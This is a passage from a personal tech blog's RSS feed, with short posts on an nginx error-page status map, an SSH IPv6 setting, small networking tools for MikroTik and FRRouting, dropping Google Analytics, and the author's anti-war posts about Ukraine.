  1899. For this we define a mapping of status codes to the error messages.</p>
  1900. <pre>
  1901. map $status $status_text {
  1902.  400 'Bad Request';
  1903.  401 'Unauthorized';
  1904.  402 'Payment Required';
  1905.  403 'Forbidden';
  1906.  404 'Not Found';
  1907.  405 'Method Not Allowed';
  1908.  406 'Not Acceptable';
  1909.  407 'Proxy Authentication Required';
  1910.  408 'Request Timeout';
  1911.  409 'Conflict';
  1912.  410 'Gone';
  1913.  411 'Length Required';
  1914.  412 'Precondition Failed';
  1915.  413 'Payload Too Large';
  1916.  414 'URI Too Long';
  1917.  415 'Unsupported Media Type';
  1918.  416 'Range Not Satisfiable';
  1919.  417 'Expectation Failed';
  1920.  418 'I\'m a teapot';
  1921.  421 'Misdirected Request';
  1922.  422 'Unprocessable Entity';
  1923.  423 'Locked';
  1924.  424 'Failed Dependency';
  1925.  425 'Too Early';
  1926.  426 'Upgrade Required';
  1927.  428 'Precondition Required';
  1928.  429 'Too Many Requests';
  1929.  431 'Request Header Fields Too Large';
  1930.  451 'Unavailable For Legal Reasons';
  1931.  500 'Internal Server Error';
  1932.  501 'Not Implemented';
  1933.  502 'Bad Gateway';
  1934.  503 'Service Unavailable';
  1935.  504 'Gateway Timeout';
  1936.  505 'HTTP Version Not Supported';
  1937.  506 'Variant Also Negotiates';
  1938.  507 'Insufficient Storage';
  1939.  508 'Loop Detected';
  1940.  510 'Not Extended';
  1941.  511 'Network Authentication Required';
  1942.  default 'Something went wrong';
  1943. }
  1944. </pre>
  1945.  
  1946. <p>Now we have the <var>status</var> and the <var>status_text</var> variables available in our error.html page.</p>
  1947. <pre>
  1948. &lt;html&gt;&lt;body&gt;
  1949. &lt;h1&gt;&lt;!--# echo var="status" default="" --&gt;
  1950. &lt;!--# echo var="status_text" default="Something went wrong" --&gt;&lt;/h1&gt;
  1951. &lt;/body&gt;&lt;/html&gt;
  1952. </pre>
  1953. ]]></content:encoded>
  1954.  </item>
  1955.  
  1956.  <item>
  1957.    <title>nitter</title>
  1958.    <link>https://blog.x-way.org/Misc/2022/06/15/nitter.html</link>
  1959.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324303</guid>
  1960.    <dc:creator>Andreas Jaggi</dc:creator>
  1961.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1962.    <pubDate>Wed, 15 Jun 2022 21:08:00 +0000</pubDate>
  1963.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1964.    <description><![CDATA[<p><a href="https://en.wikipedia.org/wiki/Nitter" title="nitter">nitter</a> provides a free and open source alternative front-end to Twitter. It talks with the API and does not show any JavaScript or ads (thus no 'forced-login' overlay after reading 5 tweets or similar nastiness).<br>
  1965. The source code for it is available on <a href="https://github.com/zedeus/nitter" title="">GitHub</a>.</p>
  1966. <p>It does a direct mapping of the profile URLs, thus <code>https://twitter.com/sheeshee</code> becomes <code>https://<b>nitter.net</b>/sheeshee</code></p>
  1967. ]]></description>
  1968.    <content:encoded><![CDATA[<p><a href="https://en.wikipedia.org/wiki/Nitter" title="nitter">nitter</a> provides a free and open source alternative front-end to Twitter. It talks with the API and does not show any JavaScript or ads (thus no 'forced-login' overlay after reading 5 tweets or similar nastiness).<br>
  1969. The source code for it is available on <a href="https://github.com/zedeus/nitter" title="">GitHub</a>.</p>
  1970. <p>It does a direct mapping of the profile URLs, thus <code>https://twitter.com/sheeshee</code> becomes <code>https://<b>nitter.net</b>/sheeshee</code></p>
  1971. ]]></content:encoded>
  1972.  </item>
  1973.  
  1974.  <item>
  1975.    <title>Blogging like 2002</title>
  1976.    <link>https://blog.x-way.org/Webdesign/2022/06/04/Blogging-like-2002.html</link>
  1977.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324302</guid>
  1978.    <dc:creator>Andreas Jaggi</dc:creator>
  1979.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1980.    <pubDate>Sat, 04 Jun 2022 11:32:00 +0000</pubDate>
  1981.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1982.    <description><![CDATA[<p>On the occasion of the <a href="https://blog.x-way.org/Misc/2022/06/02/Happy-20th-Birthday-x-log.html" title="Happy 20th Birthday x-log">20th anniversary of this blog</a>, I've used <a href="https://archive.org/" title="Internet Archive">archive.org</a> to reconstruct the original HTML layout from back in the time and applied it to the Jekyll templates.</p>
  1983. <p>Enjoy the blog in all the (&lt;table&gt; based) glory from 2002 :-)</p>
  1984. ]]></description>
  1985.    <content:encoded><![CDATA[<p>On the occasion of the <a href="https://blog.x-way.org/Misc/2022/06/02/Happy-20th-Birthday-x-log.html" title="Happy 20th Birthday x-log">20th anniversary of this blog</a>, I've used <a href="https://archive.org/" title="Internet Archive">archive.org</a> to reconstruct the original HTML layout from back in the time and applied it to the Jekyll templates.</p>
  1986. <p>Enjoy the blog in all the (&lt;table&gt; based) glory from 2002 :-)</p>
  1987. ]]></content:encoded>
  1988.  </item>
  1989.  
  1990.  <item>
  1991.    <title>Happy 20th Birthday x-log</title>
  1992.    <link>https://blog.x-way.org/Misc/2022/06/02/Happy-20th-Birthday-x-log.html</link>
  1993.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324301</guid>
  1994.    <dc:creator>Andreas Jaggi</dc:creator>
  1995.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1996.    <pubDate>Thu, 02 Jun 2022 22:54:00 +0000</pubDate>
  1997.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1998.    <description><![CDATA[<p>On June 2nd 2002 I published the first (test) entry in this weblog. The first entry has disappeared since (thus making <a href="https://blog.x-way.org/Webdesign/2002/06/03/Flash-Sites.html" title="Flash-Sites">the second entry</a> the first one in the <a href="https://blog.x-way.org/archive/archive-2002-06.html" title="x-log - Archive - 2002-06" >archive of June 2002</a>).</p>
  1999. <p><img src="https://blog.x-way.org/images/first_entry.png" alt="Screenshot of the first (test) entry" height="59" width="290"></p>
  2000. <p>Compared to <a href="https://web.archive.org/web/20020808101503/http://waterwave.ch/weblog/about.php" title="archive.org x-log about page from 2002">20 years ago</a>, the about page no longer needs to explain what a weblog is.<br>
  2001. Interesting though that the linked <a href="https://web.archive.org/web/20011204164555/http://www.jonet.org/data/beitraege.983619029.22602.html" title="archive.org: Peter Praschl: Was ist eigentlich ein Weblog?">definition of a weblog</a> from back then already did foresee the rise and fall in popularity of weblogs which happend during the last two decades.<br>To me it seems in the last 1-2 years there has been an increase again in activity around personal weblogs; curious to see if this revival trend continues.
  2002. </p>
  2003. <p>Also the weblog here has changed quite a bit. Initially its content was more on the pure web-logging side (commenting on interesting links I encountered during my daily Internet surfing) mixed with some kind of a journal/commentary of my day-to-day life. Later on it moved more towards a 'knowledge dump' on technical topics mixed with some music discoveries and random personal post from festivals and travels. And lately it has been rather sparse again with posts, still mostly on technical topics around coding, networking, security mixed with some personal posts commenting on the current world situation.<br>The frequency of posts also followed the changes in content where early on there sometimes were multiple posts per day, nowadays there can be multiple months without any post and there were even entire years where nothing new was posted; let's see how this goes in the future :-)</p>
  2004. <p>From the list of linked Blogs in 2002, only deep-resonance aka <a href="https://kniebes.com/" title="Markus Kniebes">mk</a> is still active, special shout-out to <a href="https://kniebes.com/now">Markus</a> for the continuous persistence.<br>To the next twenty years :-)</p>
  2005. ]]></description>
  2006.    <content:encoded><![CDATA[<p>On June 2nd 2002 I published the first (test) entry in this weblog. The first entry has disappeared since (thus making <a href="https://blog.x-way.org/Webdesign/2002/06/03/Flash-Sites.html" title="Flash-Sites">the second entry</a> the first one in the <a href="https://blog.x-way.org/archive/archive-2002-06.html" title="x-log - Archive - 2002-06" >archive of June 2002</a>).</p>
  2007. <p><img src="https://blog.x-way.org/images/first_entry.png" alt="Screenshot of the first (test) entry" height="59" width="290"></p>
  2008. <p>Compared to <a href="https://web.archive.org/web/20020808101503/http://waterwave.ch/weblog/about.php" title="archive.org x-log about page from 2002">20 years ago</a>, the about page no longer needs to explain what a weblog is.<br>
  2009. Interesting though that the linked <a href="https://web.archive.org/web/20011204164555/http://www.jonet.org/data/beitraege.983619029.22602.html" title="archive.org: Peter Praschl: Was ist eigentlich ein Weblog?">definition of a weblog</a> from back then already did foresee the rise and fall in popularity of weblogs which happend during the last two decades.<br>To me it seems in the last 1-2 years there has been an increase again in activity around personal weblogs; curious to see if this revival trend continues.
  2010. </p>
  2011. <p>Also the weblog here has changed quite a bit. Initially its content was more on the pure web-logging side (commenting on interesting links I encountered during my daily Internet surfing) mixed with some kind of a journal/commentary of my day-to-day life. Later on it moved more towards a 'knowledge dump' on technical topics mixed with some music discoveries and random personal post from festivals and travels. And lately it has been rather sparse again with posts, still mostly on technical topics around coding, networking, security mixed with some personal posts commenting on the current world situation.<br>The frequency of posts also followed the changes in content where early on there sometimes were multiple posts per day, nowadays there can be multiple months without any post and there were even entire years where nothing new was posted; let's see how this goes in the future :-)</p>
  2012. <p>From the list of linked Blogs in 2002, only deep-resonance aka <a href="https://kniebes.com/" title="Markus Kniebes">mk</a> is still active, special shout-out to <a href="https://kniebes.com/now">Markus</a> for the continuous persistence.<br>To the next twenty years :-)</p>
  2013. ]]></content:encoded>
  2014.  </item>
  2015.  
  2016.  <item>
  2017.    <title>mt-set-time</title>
  2018.    <link>https://blog.x-way.org/Networking/2022/03/26/mt-set-time.html</link>
  2019.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324300</guid>
  2020.    <dc:creator>Andreas Jaggi</dc:creator>
  2021.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2022.    <pubDate>Sat, 26 Mar 2022 16:15:00 +0000</pubDate>
  2023.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2024.    <description><![CDATA[<p>A while ago I wrote a little tool to set the time on <a href="https://mikrotik.com/" title="MikroTik Routers and Wireless">MikroTik</a> devices.
  2025. It takes the current time from the local machine and does set it on the device through the API (while respecting the timezone configured on it).<br>
  2026. I mostly use it to set the proper time when the device time was completely off (when setting up a new device or when it has been powered off for a long time).
  2027. Afterwards NTP should take care of keeping the time in sync.</p>
  2028. <p>The tool is now available on GitHub together with installation and usage instructions: <a href="https://github.com/x-way/mt-set-time" title="x-way/mt-set-time: Set time on MikroTik routers">mt-set-time</a></p>
  2029. ]]></description>
  2030.    <content:encoded><![CDATA[<p>A while ago I wrote a little tool to set the time on <a href="https://mikrotik.com/" title="MikroTik Routers and Wireless">MikroTik</a> devices.
  2031. It takes the current time from the local machine and does set it on the device through the API (while respecting the timezone configured on it).<br>
  2032. I mostly use it to set the proper time when the device time was completely off (when setting up a new device or when it has been powered off for a long time).
  2033. Afterwards NTP should take care of keeping the time in sync.</p>
  2034. <p>The tool is now available on GitHub together with installation and usage instructions: <a href="https://github.com/x-way/mt-set-time" title="x-way/mt-set-time: Set time on MikroTik routers">mt-set-time</a></p>
  2035. ]]></content:encoded>
  2036.  </item>
  2037.  
  2038.  <item>
  2039.    <title>Fight Putin - Ride a Bike</title>
  2040.    <link>https://blog.x-way.org/Misc/2022/03/15/Fight-Putin-Ride-a-Bike.html</link>
  2041.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324299</guid>
  2042.    <dc:creator>Andreas Jaggi</dc:creator>
  2043.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2044.    <pubDate>Tue, 15 Mar 2022 12:55:00 +0000</pubDate>
  2045.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  2046.    <description><![CDATA[<p><a href="https://blog.x-way.org/images/fight-putin-ride-a-bike.jpeg" title="Fight Putin - Ride a Bike"><img src="https://blog.x-way.org/images/fight-putin-ride-a-bike_small.jpeg" alt="Fight Putin - Ride a Bike" height="515" width="300"></a></p>
  2047. ]]></description>
  2048.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/images/fight-putin-ride-a-bike.jpeg" title="Fight Putin - Ride a Bike"><img src="https://blog.x-way.org/images/fight-putin-ride-a-bike_small.jpeg" alt="Fight Putin - Ride a Bike" height="515" width="300"></a></p>
  2049. ]]></content:encoded>
  2050.  </item>
  2051.  
  2052.  <item>
  2053.    <title>Dr Putin isch</title>
  2054.    <link>https://blog.x-way.org/Music/2022/02/27/Dr-Putin-isch.html</link>
  2055.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324298</guid>
  2056.    <dc:creator>Andreas Jaggi</dc:creator>
  2057.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2058.    <pubDate>Sun, 27 Feb 2022 11:53:00 +0000</pubDate>
  2059.    <category domain="https://blog.x-way.org/Music">Music</category>
  2060.    <description><![CDATA[<p><a href="https://youtu.be/R-oqHUlptq8" title="Dr Putin isch e Hueresohn - YouTube">Dr Putin isch e Hueresohn</a></p>
  2061. <p>(<a href="https://www.reddit.com/r/BUENZLI/comments/t08crk/mis_neue_lieblingslied/" title="/r/BUENZLI on reddit.com">via</a>)</p>
  2062. ]]></description>
  2063.    <content:encoded><![CDATA[<p><a href="https://youtu.be/R-oqHUlptq8" title="Dr Putin isch e Hueresohn - YouTube">Dr Putin isch e Hueresohn</a></p>
  2064. <p>(<a href="https://www.reddit.com/r/BUENZLI/comments/t08crk/mis_neue_lieblingslied/" title="/r/BUENZLI on reddit.com">via</a>)</p>
  2065. ]]></content:encoded>
  2066.  </item>
  2067.  
  2068.  <item>
  2069.    <title>Non à la guerre! Nein zum Krieg!</title>
  2070.    <link>https://blog.x-way.org/Misc/2022/02/26/Non-a-la-guerre-Nein-zum-Krieg.html</link>
  2071.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324297</guid>
  2072.    <dc:creator>Andreas Jaggi</dc:creator>
  2073.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2074.    <pubDate>Sat, 26 Feb 2022 21:22:00 +0000</pubDate>
  2075.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  2076.    <description><![CDATA[<p>Today I went to Bern to the <a href="https://www.swissinfo.ch/eng/ukraine--up-to-20-000-people-march-in-bern-for-peace/47383836" title="Ukraine: up to 20'000 people march in Bern for peace">rally for peace</a>.<br>
  2077. My motivation was to show support for the people suffering in this war and to send a signal to our swiss government that the population wants clear participation in sanctions (while remaining neutral, the two in my view are not exclusive!).</p>
  2078. <p>Swiss media reported that this was the largest rally for peace in Switzerland since the <a href="https://blog.x-way.org/Misc/2003/03/22/Tous_ensemble_tous_ensemble_non_a_la_guerre.html" title="x-log - Tous ensemble, tous ensemble, non à la guerre!">rallies against the war in Iraq in 2003</a>. That I can link to my own blog entry regarding the rally for peace from 19 years ago, makes me sad.<br>
  2079. Clearly we as human species did not progress enough on this topic :-(</p>
  2080. <p>Besides showing up to the rally, I also did donate to the <a href="https://www.icrc.org/" title="International Committee of the Red Cross">ICRC</a> to provide humanitarian aid and I do encourage you to do the same.</p>
  2081. ]]></description>
  2082.    <content:encoded><![CDATA[<p>Today I went to Bern to the <a href="https://www.swissinfo.ch/eng/ukraine--up-to-20-000-people-march-in-bern-for-peace/47383836" title="Ukraine: up to 20'000 people march in Bern for peace">rally for peace</a>.<br>
  2083. My motivation was to show support for the people suffering in this war and to send a signal to our swiss government that the population wants clear participation in sanctions (while remaining neutral, the two in my view are not exclusive!).</p>
  2084. <p>Swiss media reported that this was the largest rally for peace in Switzerland since the <a href="https://blog.x-way.org/Misc/2003/03/22/Tous_ensemble_tous_ensemble_non_a_la_guerre.html" title="x-log - Tous ensemble, tous ensemble, non à la guerre!">rallies against the war in Iraq in 2003</a>. That I can link to my own blog entry regarding the rally for peace from 19 years ago, makes me sad.<br>
  2085. Clearly we as human species did not progress enough on this topic :-(</p>
  2086. <p>Besides showing up to the rally, I also did donate to the <a href="https://www.icrc.org/" title="International Committee of the Red Cross">ICRC</a> to provide humanitarian aid and I do encourage you to do the same.</p>
  2087. ]]></content:encoded>
  2088.  </item>
  2089.  
  2090.  <item>
  2091.    <title>EFF Member Badge 2022</title>
  2092.    <link>https://blog.x-way.org/Badges/2022/02/20/EFF-Member-Badge-2022.html</link>
  2093.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324296</guid>
  2094.    <dc:creator>Andreas Jaggi</dc:creator>
  2095.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2096.    <pubDate>Sun, 20 Feb 2022 09:22:00 +0000</pubDate>
  2097.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  2098.    <description><![CDATA[<p><a href="https://www.eff.org/" title="Electronic Frontier Foundation | Defending your rights in the digital world"><img src="https://blog.x-way.org/images/member-badge-2022b.jpg" alt="EFF Member Badge 2022" height="300" width="300"></a></p>
  2099. ]]></description>
  2100.    <content:encoded><![CDATA[<p><a href="https://www.eff.org/" title="Electronic Frontier Foundation | Defending your rights in the digital world"><img src="https://blog.x-way.org/images/member-badge-2022b.jpg" alt="EFF Member Badge 2022" height="300" width="300"></a></p>
  2101. ]]></content:encoded>
  2102.  </item>
  2103.  
  2104.  <item>
  2105.    <title>vtysock</title>
  2106.    <link>https://blog.x-way.org/Networking/2022/01/29/vtysock.html</link>
  2107.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324295</guid>
  2108.    <dc:creator>Andreas Jaggi</dc:creator>
  2109.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2110.    <pubDate>Sat, 29 Jan 2022 21:38:00 +0000</pubDate>
  2111.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2112.    <description><![CDATA[<p>After switching my Debian hosts from <a href="https://en.wikipedia.org/wiki/Quagga_(software)" title="Quagga Software Routing Suite">Quagga</a> to <a href="https://frrouting.org/" title="FRRouting">FRRouting</a>, I noticed that running vtysh has become quite a bit slower especially when making multiple calls to it from my status/monitoring scripts.
  2113. <br>This has also been observed by other users of FRRouting (there's an open issue in their bugtracker: <a href="https://github.com/FRRouting/frr/issues/7799" title="vtysh is significantly slower in FRR than Quagga">#7799</a>).</p>
  2114. <p>The Prometheus <a href="https://github.com/tynany/frr_exporter" title="Prometheus exporter for Free Range Routing">frr_exporter</a> works around this by directly sending commands to the UNIX sockets of the FRR daemons (<a href="https://github.com/tynany/frr_exporter/pull/50" title="frr_exporter - refactor: send cmds to unix socket">PR</a>).</p>
  2115. <p>To use the same approach in my monitoring scripts, I wrote a small utility which acts as a drop-in replacement for vtysh and sends the commands directly to the UNIX sockets of the FRR daemons: <a href="https://github.com/x-way/vtysock" title="x-way/vtysock - a quick vtysh replacement">vtysock</a>
  2116. <br>By skipping the parsing and validation checks done in vtysh, vtysock can achieve a significant speed improvement when executing commands.</p>
  2117. ]]></description>
  2118.    <content:encoded><![CDATA[<p>After switching my Debian hosts from <a href="https://en.wikipedia.org/wiki/Quagga_(software)" title="Quagga Software Routing Suite">Quagga</a> to <a href="https://frrouting.org/" title="FRRouting">FRRouting</a>, I noticed that running vtysh has become quite a bit slower especially when making multiple calls to it from my status/monitoring scripts.
  2119. <br>This has also been observed by other users of FRRouting (there's an open issue in their bugtracker: <a href="https://github.com/FRRouting/frr/issues/7799" title="vtysh is significantly slower in FRR than Quagga">#7799</a>).</p>
  2120. <p>The Prometheus <a href="https://github.com/tynany/frr_exporter" title="Prometheus exporter for Free Range Routing">frr_exporter</a> works around this by directly sending commands to the UNIX sockets of the FRR daemons (<a href="https://github.com/tynany/frr_exporter/pull/50" title="frr_exporter - refactor: send cmds to unix socket">PR</a>).</p>
  2121. <p>To use the same approach in my monitoring scripts, I wrote a small utility which acts as a drop-in replacement for vtysh and sends the commands directly to the UNIX sockets of the FRR daemons: <a href="https://github.com/x-way/vtysock" title="x-way/vtysock - a quick vtysh replacement">vtysock</a>
  2122. <br>By skipping the parsing and validation checks done in vtysh, vtysock can achieve a significant speed improvement when executing commands.</p>
  2123. ]]></content:encoded>
  2124.  </item>
  2125.  
  2126.  <item>
  2127.    <title>Force SSH to use IPv6</title>
  2128.    <link>https://blog.x-way.org/Networking/2022/01/23/Force-SSH-to-use-IPv6.html</link>
  2129.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324294</guid>
  2130.    <dc:creator>Andreas Jaggi</dc:creator>
  2131.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2132.    <pubDate>Sun, 23 Jan 2022 10:53:00 +0000</pubDate>
  2133.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2134.    <description><![CDATA[<p>In situations where IPv6 connectivity performs better than IPv4, you might want to force SSH to use IPv6. In interactive mode this can be achieved with the <code>-6</code> commandline parameter.<br>But in situations where you can't modify the commandline parameters a different approach is needed (for example in rsync backup scripts which use SSH as underlying transport layer).</p>
  2135. <p>We can use the <a href="https://man.openbsd.org/ssh_config.5" title="ssh_config(5) - OpenBSD manual pages">ssh_config</a> file to encforce that IPv6 is used for a specific host:</p>
  2136. <pre>
  2137. Host myipv6host
  2138. AddressFamily inet6
  2139. </pre>
  2140. <p>This instructs all SSH commands to use IPv6 when connecting to myipv6host.</p>
  2141. <p>The same approach also works to force usage of <a href="https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html">Legacy IP</a> by specyfing <code>inet</code> as address family.</p>
  2142. ]]></description>
  2143.    <content:encoded><![CDATA[<p>In situations where IPv6 connectivity performs better than IPv4, you might want to force SSH to use IPv6. In interactive mode this can be achieved with the <code>-6</code> commandline parameter.<br>But in situations where you can't modify the commandline parameters a different approach is needed (for example in rsync backup scripts which use SSH as underlying transport layer).</p>
  2144. <p>We can use the <a href="https://man.openbsd.org/ssh_config.5" title="ssh_config(5) - OpenBSD manual pages">ssh_config</a> file to encforce that IPv6 is used for a specific host:</p>
  2145. <pre>
  2146. Host myipv6host
  2147. AddressFamily inet6
  2148. </pre>
  2149. <p>This instructs all SSH commands to use IPv6 when connecting to myipv6host.</p>
  2150. <p>The same approach also works to force usage of <a href="https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html">Legacy IP</a> by specyfing <code>inet</code> as address family.</p>
  2151. ]]></content:encoded>
  2152.  </item>
  2153.  
  2154.  <item>
  2155.    <title>Google Analytics removed</title>
  2156.    <link>https://blog.x-way.org/Webdesign/2022/01/19/Google-Analytics-removed.html</link>
  2157.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324293</guid>
  2158.    <dc:creator>Andreas Jaggi</dc:creator>
  2159.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2160.    <pubDate>Wed, 19 Jan 2022 22:45:00 +0000</pubDate>
  2161.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  2162.    <description><![CDATA[<p>After running it for a bit more than a decade, I've now removed again the Google Analytics tracking from this site. It does not feel appropriate anymore on a personal website.<br>At the moment no alternative statistics solution is in place yet, but I could imagine setting up a self-hosted solution like <a href="https://matomo.org/" title="Matomo Analytics - The Google Analytics alternative that protects your data">Matomo</a> or <a href="https://plausible.io/" title="Plausible Analytics | Simple, privacy-friendly Google Analytics alternative">Plausible</a> in the future.</p>
  2163. ]]></description>
  2164.    <content:encoded><![CDATA[<p>After running it for a bit more than a decade, I've now removed again the Google Analytics tracking from this site. It does not feel appropriate anymore on a personal website.<br>At the moment no alternative statistics solution is in place yet, but I could imagine setting up a self-hosted solution like <a href="https://matomo.org/" title="Matomo Analytics - The Google Analytics alternative that protects your data">Matomo</a> or <a href="https://plausible.io/" title="Plausible Analytics | Simple, privacy-friendly Google Analytics alternative">Plausible</a> in the future.</p>
  2165. ]]></content:encoded>
  2166.  </item>
  2167.  
  2168.  <item>
  2169.    <title>Google Analytics declared illegal in the EU</title>
  2170.    <link>https://blog.x-way.org/Webdesign/2022/01/19/Google-Analytics-declared-illegal-in-the-EU.html</link>
  2171.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324292</guid>
  2172.    <dc:creator>Andreas Jaggi</dc:creator>
  2173.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2174.    <pubDate>Wed, 19 Jan 2022 20:45:00 +0000</pubDate>
  2175.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  2176.    <description><![CDATA[<p><a href="https://tuta.com/blog/posts/is-google-analytics-illegal/" title="Google Analytics declared illegal in the EU">Google Analytics declared illegal in the EU</a>.</p>
  2177. ]]></description>
  2178.    <content:encoded><![CDATA[<p><a href="https://tuta.com/blog/posts/is-google-analytics-illegal/" title="Google Analytics declared illegal in the EU">Google Analytics declared illegal in the EU</a>.</p>
  2179. ]]></content:encoded>
  2180.  </item>
  2181.  
  2182.  <item>
  2183.    <title>Wordle</title>
  2184.    <link>https://blog.x-way.org/Misc/2022/01/05/Wordle.html</link>
  2185.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324291</guid>
  2186.    <dc:creator>Andreas Jaggi</dc:creator>
  2187.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2188.    <pubDate>Wed, 05 Jan 2022 07:09:00 +0000</pubDate>
  2189.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  2190.    <description><![CDATA[<p><a href="https://www.nytimes.com/games/wordle/index.html" title="Wordle - A daily word game">Wordle</a> seems to be the trending topic these days.<br>It's a word game similar to the french <a href="https://fr.wikipedia.org/wiki/Motus_(jeu_t%C3%A9l%C3%A9vis%C3%A9)" title="Motus - Wikipedia">Motus</a> game show (resp. the american <a href="https://en.wikipedia.org/wiki/Lingo_(American_game_show)" title="Lingo - Wikipedia">Lingo</a> game show).</p>
  2191. <p>Wordle 200 4/6<br>
  2192. <br>
  2193. ⬜⬜⬜🟩⬜<br>
  2194. ⬜⬜🟨🟩⬜<br>
  2195. ⬜⬜⬜🟩🟩<br>
  2196. 🟩🟩🟩🟩🟩<br>
  2197. </p>
  2198. ]]></description>
  2199.    <content:encoded><![CDATA[<p><a href="https://www.nytimes.com/games/wordle/index.html" title="Wordle - A daily word game">Wordle</a> seems to be the trending topic these days.<br>It's a word game similar to the french <a href="https://fr.wikipedia.org/wiki/Motus_(jeu_t%C3%A9l%C3%A9vis%C3%A9)" title="Motus - Wikipedia">Motus</a> game show (resp. the american <a href="https://en.wikipedia.org/wiki/Lingo_(American_game_show)" title="Lingo - Wikipedia">Lingo</a> game show).</p>
  2200. <p>Wordle 200 4/6<br>
  2201. <br>
  2202. ⬜⬜⬜🟩⬜<br>
  2203. ⬜⬜🟨🟩⬜<br>
  2204. ⬜⬜⬜🟩🟩<br>
  2205. 🟩🟩🟩🟩🟩<br>
  2206. </p>
  2207. ]]></content:encoded>
  2208.  </item>
  2209.  
  2210.  <item>
  2211.    <title>Y2K22</title>
  2212.    <link>https://blog.x-way.org/Coding/2022/01/01/Y2K22.html</link>
  2213.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324290</guid>
  2214.    <dc:creator>Andreas Jaggi</dc:creator>
  2215.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2216.    <pubDate>Sat, 01 Jan 2022 21:48:00 +0000</pubDate>
  2217.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  2218.    <description><![CDATA[<p>Turns out that signed 32-bit numbers can be exhausted long before <a href="https://en.wikipedia.org/wiki/Year_2038_problem" title="Year 2038 problem">Y2038</a>, when you use them to store time in YYMMDDHHMM format. (<a href="https://rachelbythebay.com/w/2022/01/01/baddate/" title="rachelbythebay - YYMMDDHHMM just overflowed a signed 32 bit int">via</a>)</p>
  2219. ]]></description>
  2220.    <content:encoded><![CDATA[<p>Turns out that signed 32-bit numbers can be exhausted long before <a href="https://en.wikipedia.org/wiki/Year_2038_problem" title="Year 2038 problem">Y2038</a>, when you use them to store time in YYMMDDHHMM format. (<a href="https://rachelbythebay.com/w/2022/01/01/baddate/" title="rachelbythebay - YYMMDDHHMM just overflowed a signed 32 bit int">via</a>)</p>
  2221. ]]></content:encoded>
  2222.  </item>
  2223.  
  2224.  <item>
  2225.    <title>Open Source on Mars</title>
  2226.    <link>https://blog.x-way.org/Coding/2021/04/19/Open-Source-on-Mars.html</link>
  2227.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324289</guid>
  2228.    <dc:creator>Andreas Jaggi</dc:creator>
  2229.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2230.    <pubDate>Mon, 19 Apr 2021 16:21:00 +0000</pubDate>
  2231.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  2232.    <description><![CDATA[<p>Received a badge from GitHub's <a href="https://github.com/readme/nasa-ingenuity-helicopter" title="Open Source on Mars: Community powers NASA’s Ingenuity Helicopter - The ReadMe Project">Open Source on Mars</a> <a href="https://github.blog/2021-04-19-open-source-goes-to-mars/" title="Open source goes to Mars - The GitHub Blog">initiative</a> :-)</p>
  2233.  
  2234. <p><a href="https://github.com/x-way"><img src="https://blog.x-way.org/images/github_mars_2020_helicopter_contributor.png" alt="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" title="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" width="333" height="117"></a></p>
  2235. ]]></description>
